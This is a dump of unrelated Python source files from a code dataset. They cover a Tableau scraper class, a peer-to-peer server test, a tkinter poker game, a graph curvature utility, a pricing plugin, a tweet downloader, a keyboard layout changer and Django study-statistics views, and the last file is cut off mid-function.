presModel, self.name, noSelectFilter=True\n )\n ]\n\n def getFilters(self) -> List[str]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n else:\n presModel = tableauscraper.utils.getPresModelVizInfo(\n self._originalInfo)\n return tableauscraper.utils.listFilters(presModel, self.name)\n\n def setFilter(self, columnName, value):\n try:\n filter = [\n {\n \"globalFieldName\": t[\"globalFieldName\"],\n \"index\": t[\"values\"].index(value) + t[\"ordinal\"]\n }\n for t in self.getFilters()\n if t[\"column\"] == columnName\n ]\n if len(filter) == 0:\n self._scraper.logger.error(f\"column {columnName} not found\")\n return tableauscraper.TableauWorkbook(\n scraper=self._scraper, originalData={}, originalInfo={}, data=[]\n )\n r = tableauscraper.api.filter(\n self._scraper, self.name, filter[0][\"globalFieldName\"], [filter[0][\"index\"]])\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetsCmdResponse(self._scraper, r)\n except ValueError as e:\n self._scraper.logger.error(str(e))\n return tableauscraper.TableauWorkbook(\n scraper=self._scraper, originalData={}, originalInfo={}, data=[]\n )\n except tableauscraper.api.APIResponseException as e:\n self._scraper.logger.error(str(e))\n return tableauscraper.TableauWorkbook(\n scraper=self._scraper, originalData={}, originalInfo={}, data=[]\n )\n\n def getSelectableItems(self) -> List[str]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n return [\n {\n \"column\": t[\"fieldCaption\"],\n \"values\": next(iter([y for y in tableauscraper.utils.getData(self._data_dictionnary, [t]).values()]), [])\n }\n for t in tableauscraper.utils.getIndicesInfoVqlResponse(presModel, self.name, noSelectFilter=True)\n ]\n else:\n presModel = tableauscraper.utils.getPresModelVizData(\n self._originalData)\n if presModel is None:\n presModel = tableauscraper.utils.getPresModelVizInfo(\n self._originalInfo)\n indicesInfo = tableauscraper.utils.getIndicesInfoStoryPoint(\n presModel, self.name, noSelectFilter=True)\n else:\n indicesInfo = tableauscraper.utils.getIndicesInfo(\n presModel, self.name, noSelectFilter=True)\n return [\n {\n \"column\": t[\"fieldCaption\"],\n \"values\": next(iter([\n y\n for y in tableauscraper.utils.getData(self._data_dictionnary, [t]).values()\n ]), [])\n }\n for t in indicesInfo\n ]\n\n def getSelectableValues(self, column) -> List[str]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n columnObj = [\n t\n for t in tableauscraper.utils.getIndicesInfoVqlResponse(\n presModel, self.name, noSelectFilter=True\n )\n if t[\"fieldCaption\"] == column\n ]\n if len(columnObj) == 0:\n return []\n frameData = tableauscraper.utils.getData(\n self._data_dictionnary, [columnObj[0]]\n )\n frameDataKeys = list(frameData.keys())\n\n if len(frameDataKeys) == 0:\n return []\n return frameData[frameDataKeys[0]]\n else:\n presModel = tableauscraper.utils.getPresModelVizData(\n self._originalData)\n if presModel is None:\n presModel = tableauscraper.utils.getPresModelVizInfo(\n self._originalInfo)\n indicesInfo = tableauscraper.utils.getIndicesInfoStoryPoint(\n presModel, self.name, noSelectFilter=True)\n else:\n indicesInfo = tableauscraper.utils.getIndicesInfo(\n presModel, self.name, noSelectFilter=True)\n\n columnObj = [\n t\n for t in indicesInfo\n if t[\"fieldCaption\"] == column\n ]\n if len(columnObj) == 0:\n return []\n frameData = tableauscraper.utils.getData(\n self._data_dictionnary, [columnObj[0]]\n )\n frameDataKeys = list(frameData.keys())\n\n if len(frameDataKeys) == 0:\n return []\n return frameData[frameDataKeys[0]]\n\n def getTupleIds(self) -> List[int]:\n if self.cmdResponse:\n presModel = self._originalData[\"vqlCmdResponse\"][\"layoutStatus\"][\"applicationPresModel\"]\n columnObj = [\n t\n for t in tableauscraper.utils.getIndicesInfoVqlResponse(\n presModel, self.name, noSelectFilter=True, noFieldCaption=True\n )\n if t[\"fn\"] == \"[system:visual].[tuple_id]\"\n ]\n if len(columnObj) == 0:\n return []\n\n return [t[\"tupleIds\"] for t in columnObj]\n else:\n presModel = tableauscraper.utils.getPresModelVizData(\n self._originalData)\n columnObj = [\n t\n for t in tableauscraper.utils.getIndicesInfo(\n presModel, self.name, noSelectFilter=True, noFieldCaption=True\n )\n if t[\"fn\"] == \"[system:visual].[tuple_id]\"\n ]\n if len(columnObj) == 0:\n return []\n return [t[\"tupleIds\"] for t in columnObj]\n\n def select(self, column, value):\n values = self.getSelectableValues(column)\n tupleItems = self.getTupleIds()\n try:\n\n indexedByTuple = False\n for tupleItem in tupleItems:\n if len(tupleItem) >= len(values):\n index = values.index(value)\n index = tupleItem[index]\n indexedByTuple = True\n break\n if not indexedByTuple:\n index = values.index(value)\n index = index + 1\n r = tableauscraper.api.select(self._scraper, self.name, [index])\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetsCmdResponse(self._scraper, r)\n except ValueError as e:\n self._scraper.logger.error(str(e))\n return tableauscraper.TableauWorkbook(\n scraper=self._scraper, originalData={}, originalInfo={}, data=[]\n )\n\n def getDownloadableSummaryData(self, numRows=200):\n r = tableauscraper.api.getDownloadableSummaryData(\n self._scraper, self.name, self._scraper.dashboard, numRows)\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetDownloadCmdResponse(self._scraper, r)\n\n def getDownloadableUnderlyingData(self, numRows=200):\n r = tableauscraper.api.getDownloadableUnderlyingData(\n self._scraper, self.name, self._scraper.dashboard, numRows)\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetDownloadCmdResponse(self._scraper, r)\n\n def levelDrill(self, drillDown, position=0):\n r = tableauscraper.api.levelDrill(\n self._scraper, self.name, drillDown, position)\n self.updateFullData(r)\n return tableauscraper.dashboard.getWorksheetsCmdResponse(self._scraper, r)\n","sub_path":"tableauscraper/TableauWorksheet.py","file_name":"TableauWorksheet.py","file_ext":"py","file_size_in_byte":11468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"256150435","text":"import unittest\nimport sys\nimport time\nimport random\n\nfrom PyQt4 import QtCore, QtGui\n\nfrom dp.src.utils.log import Log\nfrom dp.src.utils.utils import Utils\nfrom dp.src.rpc.peer import Peer\nfrom dp.src.ui.stroke import Stroke\nfrom dp.src.rpc.clerk import Clerk\nfrom dp.src.session.central import CentralServer\n\nfrom .test_common import GenericTestCase\n\nimport xmlrpclib\n\nclass CentralServerTest(GenericTestCase):\n def setUp(self):\n \"\"\" Prepares a simple situation with two test servers \"\"\"\n self.servers = []\n self.peers = []\n self.ips = []\n self.ports = []\n self.ids = []\n self.clerks = []\n self.logs = []\n\n self.cs_proxies = []\n\n \n app = QtGui.QApplication(sys.argv)\n\n # setup central server\n lc = Log(100)\n while True:\n try:\n port = random.randint(1,8000)\n self.csport = port\n self.cs = CentralServer('localhost',port , lc)\n break\n except:\n continue\n\n def addSite(self):\n log = Log(len(self.peers))\n self.logs.append(log)\n self.cs_proxies.append(xmlrpclib.Server('http://%s:%s' % ('localhost', self.csport)))\n ip = 'localhost'\n while True:\n try:\n port = random.randint(1,8000)\n log.Print('got that port')\n peer = Peer(ip, port, build_ui = False, log=log)\n log.Print('got that peer')\n self.peers.append(peer)\n self.ports.append(port)\n self.ips.append(ip)\n self.clerks.append(Clerk(peer.state))\n break\n except:\n continue\n self.clerks[-1].state.cs = self.cs_proxies[-1] \n\n def addMultipleSites(self,n=1):\n \"\"\" Adds n test servers \"\"\"\n for i in range(n):\n self.addSite()\n\n def test_basic_central(self):\n \"\"\" Central - Basic server\"\"\"\n self.addMultipleSites(5)\n ck = self.clerks\n\n sess_num = ck[0].start()\n time.sleep(1)\n\n for i in range(1,4):\n ck[i].join(sess_num)\n time.sleep(1)\n ck[3].lock()\n for i in range(4,5):\n ck[i].join(sess_num)\n\n for i,c in enumerate(self.clerks):\n self.logs[i].blue(c.state.peers)\n self.logs[i].blue(c.state.id)\n\n s = self.genRandomStrokes(3)\n\n ck[0].addStroke(s[0])\n ck[1].addStroke(s[1])\n time.sleep(5)\n\n self.assertStrokesEqual(self.peers[0:3])\n # NOTE : adapt assert to query members from central server\n\n def test_hard_central(self):\n \"\"\" Central - hard requests\"\"\"\n self.addMultipleSites(12)\n ck = self.clerks\n \n sess_num = ck[0].start()\n time.sleep(1)\n\n n_joined =1\n for i in range(1,len(ck)/2):\n success = ck[i].join(sess_num)\n if success:\n n_joined += 1 \n if random.randint(0,1) == 1:\n # check duplicate requests\n success = ck[i].join(sess_num)\n\n for i in range(len(ck)/2,len(ck)):\n success = ck[i].join(sess_num)\n if success:\n n_joined += 1 \n if random.randint(0,1) == 1:\n # check duplicate requests\n ck[i].lock()\n\n time.sleep(1)\n self.assertEqual(n_joined,len(self.cs.responder.hosts[sess_num]))\n\n\n\n\n\n\n","sub_path":"test/test_central.py","file_name":"test_central.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149610971","text":"import Task\n\nclass Help(Task.Task):\n def __init__(self, dic, longer):\n self.dic = dic\n self.longer = longer\n return super(Help, self).__init__()\n def help(self, pre: str, mult: int):\n print(pre*mult + \"show this help page\")\n def run(self, params):\n print(\"TOOL HELP PAGE\")\n pre = \"\\t\"\n mult = 1\n print(pre*mult + \"-h --help --crocodile --anything-unused\")\n self.help(pre, mult+1)\n for x in self.longer:\n print(pre*mult + self.longer[x] + \" \" + x)\n self.dic[self.longer[x]].help(pre, mult+1)","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600947522","text":"from tkinter import *\r\nfrom tkinter import font\r\nfrom winsound import *\r\nfrom Card import *\r\nfrom Player import *\r\nimport random\r\nclass TexasHoldemPoker:\r\n def __init__(self):\r\n self.window = Tk()\r\n self.window.title(\"Texas Holdem Poker\")\r\n self.window.geometry(\"800x600\")\r\n self.window.configure(bg=\"green\")\r\n self.fontstyle = font.Font(self.window, size=24, weight='bold', family='Consolas')\r\n self.fontstyle2 = font.Font(self.window, size=16, weight='bold', family='Consolas')\r\n self.cardDeck = [i for i in range(52)]\r\n random.shuffle(self.cardDeck)\r\n self.player = Player(\"player\")\r\n self.dealer = Player(\"dealer\")\r\n self.betMoney = 10\r\n self.playerMoney = 1000\r\n self.LcardsPlayer = []\r\n self.LcardsDealer = []\r\n self.LfieldCard = []\r\n self.fieldCard = []\r\n self.deckN = 0\r\n self.turn = 0\r\n self.jokbo = {\"로티플\":0, \"백스플\":1, \"스티플\":2, \"포카드\":3, \\\r\n \"풀하우스\":4, \"플러쉬\":5, \"마운틴\":6, \"백스트\":7, \\\r\n \"스트레이트\":8, \"트리플\":9, \"투페어\":10, \"원페어\":11, \\\r\n \"노페어\":12}\r\n self.setupLabel()\r\n self.setupButton()\r\n self.window.mainloop()\r\n def setupButton(self):\r\n self.BCheck = Button(self.window, text=\"check\", width=6, height=1, font=self.fontstyle2, \\\r\n command=lambda X=0: self.pressedB(X))\r\n self.BCheck.place(x=50, y=500)\r\n self.BOne = Button(self.window, text=\"Bet x1\", width=6, height=1, font=self.fontstyle2, \\\r\n command=lambda X=1: self.pressedB(X))\r\n self.BOne.place(x=150, y=500)\r\n self.BDouble = Button(self.window, text=\"Bet x2\", width=6, height=1, font=self.fontstyle2, \\\r\n command=lambda X=2: self.pressedB(X))\r\n self.BDouble.place(x=250, y=500)\r\n self.Deal = Button(self.window, text=\"Deal\", width=6, height=1, font=self.fontstyle2, command=self.pressedDeal)\r\n self.Deal.place(x=600, y=500)\r\n self.Again = Button(self.window, text=\"Again\", width=6, height=1, font=self.fontstyle2,\r\n command=self.pressedAgain)\r\n self.Again.place(x=700, y=500)\r\n self.Deal['state'] = 'disabled'\r\n self.Deal['bg'] = 'gray'\r\n self.Again['state'] = 'disabled'\r\n self.Again['bg'] = 'gray'\r\n def setupLabel(self):\r\n self.LbetMoney = Label(text=\"$10\", width=4, height=1, font=self.fontstyle, bg=\"green\", fg=\"yellow\")\r\n self.LbetMoney.place(x=200, y=450)\r\n self.LplayerMoney = Label(text=\"You have $\"+str(self.playerMoney-self.betMoney), width=15, height=1, \\\r\n font=self.fontstyle, bg=\"green\", fg=\"yellow\")\r\n self.LplayerMoney.place(x=500, y=450)\r\n self.LplayerStatus = Label(text=\"\", width=10, height=1, font=self.fontstyle2, bg=\"green\", fg=\"cyan\")\r\n self.LplayerStatus.place(x=400, y=400)\r\n self.LdealerStatus = Label(text=\"\", width=10, height=1, font=self.fontstyle2, bg=\"green\", fg=\"cyan\")\r\n self.LdealerStatus.place(x=400, y=100)\r\n self.Lstatus = Label(text=\"\", width=15, height=1, font=self.fontstyle, bg=\"green\", fg=\"red\")\r\n self.Lstatus.place(x=500, y=300)\r\n def pressedB(self, X):\r\n if self.betMoney + self.betMoney * X-self.betMoney <= self.playerMoney-self.betMoney:\r\n self.betMoney += self.betMoney * X\r\n self.LbetMoney.configure(text=\"$\" + str(self.betMoney))\r\n self.LplayerMoney.configure(text=\"You have $\" + str(self.playerMoney-self.betMoney))\r\n if self.turn != 4:\r\n self.Deal[\"state\"] = \"active\"\r\n self.Deal[\"bg\"] = \"white\"\r\n PlaySound('sounds/chip.wav', SND_FILENAME)\r\n else: PlaySound('sounds/wrong.wav', SND_FILENAME)\r\n self.BCheck[\"state\"] = \"disabled\"\r\n self.BCheck[\"bg\"] = \"gray\"\r\n self.BOne[\"state\"] = \"disabled\"\r\n self.BOne[\"bg\"] = \"gray\"\r\n self.BDouble[\"state\"] = \"disabled\"\r\n self.BDouble[\"bg\"] = \"gray\"\r\n if self.turn == 4: self.showResult()\r\n def straight(self, tmp, p):\r\n for i in range(13, 4, -1):\r\n if tmp[i] and tmp[i-1] and tmp[i-2] and tmp[i-3] and tmp[i-4]:\r\n if i - 4 != 1: p.setAdd(str(i))\r\n else: p.setAdd(str(1))\r\n return True\r\n return False\r\n def calcStatus(self, p):\r\n myStatus = \"\"\r\n tmp = []\r\n for c in self.fieldCard: tmp.append(c)\r\n tmp += p.getCards()\r\n suitTMP = [0 for _ in range(4)]\r\n valTMP = [0 for _ in range(14)] #because of index\r\n for c in tmp:\r\n suitTMP[c.getX()] += 1\r\n valTMP[c.getValue()] += 1\r\n for i in range(len(suitTMP)):\r\n if suitTMP[i] >= 5:\r\n myStatus = \"플러쉬\"\r\n n = 0\r\n for c in tmp:\r\n if c.getX() == i:\r\n if c.getValue() > n or c.getValue() == 1:\r\n if c.getValue() == 1:\r\n n = 1\r\n break\r\n n = c.getValue()\r\n p.setAdd(str(n))\r\n if valTMP[10] and valTMP[11] and valTMP[12] and valTMP[13] and valTMP[1]:\r\n p.setAdd(str(1))\r\n return \"로티플\"\r\n elif valTMP[1] and valTMP[2] and valTMP[3] and valTMP[4] and valTMP[5]:\r\n p.setAdd(str(1))\r\n return \"백스플\"\r\n elif self.straight(valTMP, p): return \"스티플\"\r\n triple, d1, d2 = False, False, False\r\n a, b, c = 0, 0, 0\r\n for i in range(len(valTMP)):\r\n if valTMP[i] >= 4:\r\n p.setAdd(str(i))\r\n return \"포카드\"\r\n elif valTMP[i] >= 3:\r\n a = i\r\n triple = True\r\n elif valTMP[i] >= 2 and d1 == False:\r\n b = i\r\n d1 = True\r\n elif valTMP[i] >= 2:\r\n c = i\r\n d2 = True\r\n if triple and (d1 or d2):\r\n if 1 in (a, b, c): p.setAdd(str(1))\r\n else: p.setAdd(str(max(a, b, c)))\r\n return \"풀하우스\"\r\n if myStatus != \"\": return myStatus\r\n p.setAdd(str(1))\r\n if valTMP[10] and valTMP[11] and valTMP[12] and valTMP[13] and valTMP[1]: return \"마운틴\"\r\n if valTMP[1] and valTMP[2] and valTMP[3] and valTMP[4] and valTMP[5]: return \"백스트\"\r\n if self.straight(valTMP, p): return \"스트레이트\"\r\n if triple:\r\n p.setAdd(str(a))\r\n return \"트리플\"\r\n if 1 in (b, c): p.setAdd(str(1))\r\n else: p.setAdd(str(max(b, c)))\r\n if d1 and d2: return \"투페어\"\r\n if d1 or d2: return \"원페어\"\r\n n = 0\r\n if valTMP[1] > 0:\r\n p.setAdd(str(1))\r\n return \"노페어\"\r\n else:\r\n for i in range(2, len(valTMP)):\r\n if valTMP[i] > 0 and i > n: n = i\r\n p.setAdd(str(n))\r\n return \"노페어\"\r\n def win(self):\r\n self.Lstatus.configure(text=\"You won!!\")\r\n PlaySound('sounds/win.wav', SND_FILENAME)\r\n self.playerMoney += self.betMoney\r\n def lose(self):\r\n self.Lstatus.configure(text=\"Sorry you lost!\")\r\n PlaySound('sounds/wrong.wav', SND_FILENAME)\r\n self.playerMoney -= self.betMoney\r\n def draw(self):\r\n self.Lstatus.configure(text=\"Push\")\r\n self.playerMoney = self.playerMoney\r\n def showResult(self):\r\n for i in range(2):\r\n p = PhotoImage(file=\"cards/\" + self.dealer.cards[i].filename())\r\n self.LcardsDealer[i].configure(image=p)\r\n self.LcardsDealer[i].image = p\r\n playerStatus = self.calcStatus(self.player)\r\n dealerStatus = self.calcStatus(self.dealer)\r\n self.LdealerStatus.configure(text=dealerStatus+self.dealer.getAdd())\r\n self.LplayerStatus.configure(text=playerStatus+self.player.getAdd())\r\n if self.jokbo.get(playerStatus) < self.jokbo.get(dealerStatus): self.win()\r\n elif self.jokbo.get(playerStatus) > self.jokbo.get(dealerStatus): self.lose()\r\n else:\r\n if int(self.player.getAdd()) == 1:\r\n if int(self.dealer.getAdd()) == 1: self.draw()\r\n else: self.win()\r\n else:\r\n if int(self.dealer.getAdd()) == 1: self.lose()\r\n else:\r\n if int(self.player.getAdd()) > int(self.dealer.getAdd()): self.win()\r\n elif int(self.player.getAdd()) < int(self.dealer.getAdd()): self.lose()\r\n else: self.draw()\r\n self.betMoney = 0\r\n self.LbetMoney.configure(text=\"$\" + str(self.betMoney))\r\n self.LplayerMoney.configure(text=\"You have $\" + str(self.playerMoney-self.betMoney))\r\n self.Again['state'] = 'active'\r\n self.Again['bg'] = 'white'\r\n def pressedDeal(self):\r\n self.BCheck[\"state\"] = \"active\"\r\n self.BCheck[\"bg\"] = \"white\"\r\n self.BOne[\"state\"] = \"active\"\r\n self.BOne[\"bg\"] = \"white\"\r\n self.BDouble[\"state\"] = \"active\"\r\n self.BDouble[\"bg\"] = \"white\"\r\n self.Deal[\"state\"] = \"disabled\"\r\n self.Deal[\"bg\"] = \"gray\"\r\n if self.turn == 0:\r\n self.hitPlayer(self.player.inHand())\r\n self.hitDealerDown(self.dealer.inHand())\r\n self.hitPlayer(self.player.inHand())\r\n self.hitDealerDown(self.dealer.inHand())\r\n elif self.turn == 1:\r\n for i in range(3): self.setFieldCard()\r\n elif self.turn == 2: self.setFieldCard()\r\n elif self.turn == 3: self.setFieldCard()\r\n self.turn += 1\r\n def hitPlayer(self, n):\r\n newCard = Card(self.cardDeck[self.deckN])\r\n self.deckN += 1\r\n self.player.addCard(newCard)\r\n p = PhotoImage(file=\"cards/\" + newCard.filename())\r\n self.LcardsPlayer.append(Label(self.window, image=p))\r\n self.LcardsPlayer[self.player.inHand() - 1].image = p\r\n self.LcardsPlayer[self.player.inHand() - 1].place(x=50 + n * 80, y=350)\r\n PlaySound('sounds/cardFlip1.wav', SND_FILENAME)\r\n def hitDealerDown(self, n):\r\n newCard = Card(self.cardDeck[self.deckN])\r\n self.deckN += 1\r\n self.dealer.addCard(newCard)\r\n p = PhotoImage(file=\"cards/b2fv.png\")\r\n self.LcardsDealer.append(Label(self.window, image=p))\r\n self.LcardsDealer[self.dealer.inHand() - 1].image = p\r\n self.LcardsDealer[self.dealer.inHand() - 1].place(x=50 + n * 80, y=50)\r\n PlaySound('sounds/cardFlip1.wav', SND_FILENAME)\r\n def setFieldCard(self):\r\n newCard = Card(self.cardDeck[self.deckN])\r\n self.deckN += 1\r\n n = self.deckN-4\r\n self.fieldCard.append(newCard)\r\n p = PhotoImage(file=\"cards/\" + newCard.filename())\r\n self.LfieldCard.append(Label(self.window, image=p))\r\n self.LfieldCard[n - 1].image = p\r\n self.LfieldCard[n - 1].place(x=130 + n * 80, y=200)\r\n PlaySound('sounds/cardFlip1.wav', SND_FILENAME)\r\n def pressedAgain(self):\r\n PlaySound('sounds/ding.wav', SND_FILENAME)\r\n self.player.reset()\r\n self.dealer.reset()\r\n self.fieldCard.clear()\r\n self.Again['state'] = 'disabled'\r\n self.Again['bg'] = 'gray'\r\n self.BCheck['state'] = 'active'\r\n self.BCheck['bg'] = 'white'\r\n self.BOne['state'] = 'active'\r\n self.BOne['bg'] = 'white'\r\n self.BDouble['state'] = 'active'\r\n self.BDouble['bg'] = 'white'\r\n for l in self.LcardsPlayer: l.destroy()\r\n for l in self.LcardsDealer: l.destroy()\r\n for l in self.LfieldCard: l.destroy()\r\n self.LcardsPlayer = []\r\n self.LcardsDealer = []\r\n self.LfieldCard = []\r\n self.LplayerStatus[\"text\"] = \"\"\r\n self.LdealerStatus[\"text\"] = \"\"\r\n self.Lstatus[\"text\"] = \"\"\r\n self.turn = 0\r\n self.deckN = 0\r\n self.betMoney = 10\r\n self.cardDeck = [i for i in range(52)]\r\n random.shuffle(self.cardDeck)\r\n self.betMoney = 10\r\n self.LbetMoney.configure(text=\"$\" + str(self.betMoney))\r\n self.LplayerMoney.configure(text=\"You have $\" + str(self.playerMoney - self.betMoney))\r\nTexasHoldemPoker()\r\n","sub_path":"TexasHoldemPoker.py","file_name":"TexasHoldemPoker.py","file_ext":"py","file_size_in_byte":12465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"608408875","text":"import networkx as nx\r\nimport numpy as np\r\nimport math\r\nfrom GraphRicciCurvature.OllivierRicci import OllivierRicci\r\nimport os\r\nimport pickle as pkl\r\n\r\ndef compute_ricci(args, data_path):\r\n G = load_graph(args.dataset, args.use_feats, data_path)\r\n orc = OllivierRicci(G, alpha=0.5, verbose=\"INFO\")\r\n orc.compute_ricci_curvature()\r\n G_orc = orc.G.copy()\r\n summary_stats(G_orc)\r\n\r\ndef summary_stats(G):\r\n print(\"Sanity check of first 5 edges:\")\r\n for n1,n2 in list(G.edges())[:5]:\r\n print(\"Ollivier-Ricci curvature of edge (%s,%s) is %f\" % (n1 ,n2, G[n1][n2][\"ricciCurvature\"]))\r\n ricci_curvtures = nx.get_edge_attributes(G, \"ricciCurvature\").values()\r\n print(\"Mean Ricci Curvatures: {}\".format(np.mean(ricci_curvtures)))\r\n\r\ndef load_graph(dataset_str, use_feats, data_path):\r\n if dataset in ['cora', 'pubmed']:\r\n with open(os.path.join(data_path, \"ind.{}.graph\".format(dataset_str)), 'rb') as f:\r\n if sys.version_info > (3, 0):\r\n graph = pkl.load(f, encoding='latin1')\r\n else:\r\n graph = pkl.load(f)\r\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph))\r\n G = nx.from_numpy_matrix(adj)\r\n elif dataset == 'disease_lp':\r\n pass\r\n else:\r\n raise FileNotFoundError('Dataset {} is not supported.'.format(dataset))\r\n return G\r\n","sub_path":"utils/ricci_utils.py","file_name":"ricci_utils.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154182305","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom ralph.util import plugin, api_pricing\nfrom ralph_pricing.models import UsageType, DailyUsage, Device, DailyDevice\n\nlogger = logging.getLogger(__name__)\n\n\ndef update_usage(device, venture, date, value, usage_type):\n usage, created = DailyUsage.objects.get_or_create(\n date=date,\n type=usage_type,\n pricing_device=device,\n )\n usage.pricing_venture = venture\n usage.value = value\n usage.save()\n\n\ndef update(data, date, usage_type):\n try:\n device = Device.objects.get(\n device_id=data['device_id'],\n )\n except Device.DoesNotExist:\n logger.warning(\n 'Device {} not found in Scrooge'.format(data['device_id'])\n )\n return False\n\n venture = None\n try:\n daily_device = device.dailydevice_set.get(date=date)\n venture = daily_device.pricing_venture\n except DailyDevice.DoesNotExist:\n logger.warning('DailyDevice for id {} and date {} not found'.format(\n data['device_id'],\n date,\n ))\n return False\n if venture is None:\n logger.error(\n 'Venture not specified for DailyDevice {} and date {}'.format(\n data['device_id'],\n date,\n )\n )\n return False\n update_usage(device, venture, date, 1, usage_type)\n return True\n\n\ndef get_usage_type():\n return UsageType.objects.get_or_create(\n symbol='san',\n defaults=dict(\n name='SAN',\n )\n )\n\n\n@plugin.register(chain='pricing', requires=['assets'])\ndef san(**kwargs):\n \"\"\"Updates the SAN usages from Ralph.\"\"\"\n usage_type, created = get_usage_type()\n date = kwargs['today']\n results = [update(d, date, usage_type) for d in api_pricing.get_fc_cards()]\n return (\n True,\n 'SAN usages updated:{} (total: {})'.format(sum(results), len(results)),\n kwargs\n )\n","sub_path":"src/ralph_pricing/plugins/collects/san.py","file_name":"san.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"75591757","text":"from convert import Convert\nfrom pyperclip import paste, copy\nfrom keyboard import add_hotkey, press_and_release, wait\nfrom sys import exit\n\nclass Changer:\n\n\tdef __init__(self, hotkey):\n\n\t\tadd_hotkey(hotkey, Changer.change_symbols)\n\n\t@staticmethod\n\tdef change_symbols():\n\t\t\n\t\tpress_and_release('ctrl+c')\n\n\t\tclipboard = Convert.convert_symbols(paste())\n\n\t\tif clipboard is None:\n\t\t\treturn\n\n\t\tcopy(clipboard)\n\t\tpress_and_release('ctrl+v')\n\n\t@staticmethod\n\tdef start():\n\n\t\twait()\n\nif __name__ == '__main__':\n\n\ttry:\n\t\tHOTKEY = 'ctrl+b'\n\t\tChanger(HOTKEY).start()\n\texcept (KeyboardInterrupt, SystemExit):\n\t\texit()\n","sub_path":"layout_changer.py","file_name":"layout_changer.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"131270865","text":"import tweepy\nfrom tweepy import OAuthHandler\nfrom twitter_API_credentials import *\n\nouttweets = []\n\ndef getTweets(screen_name):\n\t#OAuth interface\n\tauth = OAuthHandler(consumer_key,consumer_secret)\n\tauth.set_access_token(access_key,access_secret)\n\tapi=tweepy.API(auth)\n\n\t#Gather all tweets\n\ttweets = []\n\tnewTweets = api.user_timeline(screen_name = screen_name,count=500)\n\ttweets.extend(newTweets)\n\toldest = tweets[-1].id - 1\n\tcount = 0\n\n\twhile len(newTweets) > 0:\n\t\t#all subsiquent requests use the max_id param to prevent duplicates\n\t\tnewTweets = api.user_timeline(screen_name = screen_name,count=500,max_id=oldest)\n\t\t\n\t\t#save most recent tweets\n\t\ttweets.extend(newTweets)\n\t\t\n\t\t#update the id of the oldest tweet less one\n\t\toldest = tweets[-1].id - 1\n\t\t\n\t\tprint(\"Getting \"+ str(count)+\" Tweets\")\n\t\tcount = count + 1;\n\n\touttweets = [tweet.text.encode(\"utf-8\") for tweet in tweets]\n\tstoreTweets = open('gems.txt', 'w')\n\n\tfor item in outtweets:\n \t\tstoreTweets.write(\"%s\\n\" % item)\n\nif __name__ == '__main__':\n\tgetTweets(\"realDonaldTrump\")\n\n\t\n","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"308983449","text":"num = '8461'\nmult = 1\nresult = [int(index) for index in num]\nresult.reverse()\nprint (result)\nresult.sort()\nprint (result)\nfor i in range(1, 4):\n mult *= result[i]\nprint (mult)","sub_path":"homework_task2.py","file_name":"homework_task2.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"419586438","text":"from django.shortcuts import render, redirect, render_to_response\nfrom django.http import HttpResponse\nfrom .forms import UserLoginForm, CreateUserForm, StatisticsWriteForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, logout\nfrom django.template.context_processors import csrf\nfrom .util.time import getmonthdays, gettoday, getmonth, getyear, str_yearnow, get_weeks_date, fdstr\nfrom .models import UserStudyData\nfrom .util.modelmanage import DBManager\nfrom .util.statistics import calc_study_time, calc_week_data, calc_week_top_data, calc_lastweek_data, calc_average_data, calc_average_hour_data, calc_getlabel, calc_average_month_data\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom datetime import date\n\nfrom django.contrib.auth import (\n\tauthenticate, get_user_model, login, logout\n)\n\n# Create your views here.\ndef index(request):\n calc_week_data(request.user.username)\n return render(request, 'elections/index.html')\n\ndef statistics(request):\n return render(request, 'elections/statistics.html')\n\n\n# ======================================================================================================= #\n\n#수학 통계량 보여주는 view\ndef statisticsview_math(request):\n week_days = get_weeks_date(0)\n calc_week = calc_week_data(request.user.username)\n top_d = calc_week_top_data(request.user.username, 'math')\n lastweek = calc_lastweek_data(request.user.username)\n average = calc_average_data(request.user.username, 'math')\n h_average = calc_average_hour_data(request.user.username, 'math')\n label = calc_getlabel(average)\n if calc_week['nonecount'] == 7:\n top_d[0] = 10\n\n cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d, 'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average, 'h_average': h_average\n , 'label': label}\n return render(request, 'elections/viewstatistics_math.html', cont)\n\n# 과학 통계량 보여주는 view\ndef statisticsview_science(request):\n week_days = get_weeks_date(0)\n calc_week = calc_week_data(request.user.username)\n top_d = calc_week_top_data(request.user.username, 'science')\n lastweek = calc_lastweek_data(request.user.username)\n average = 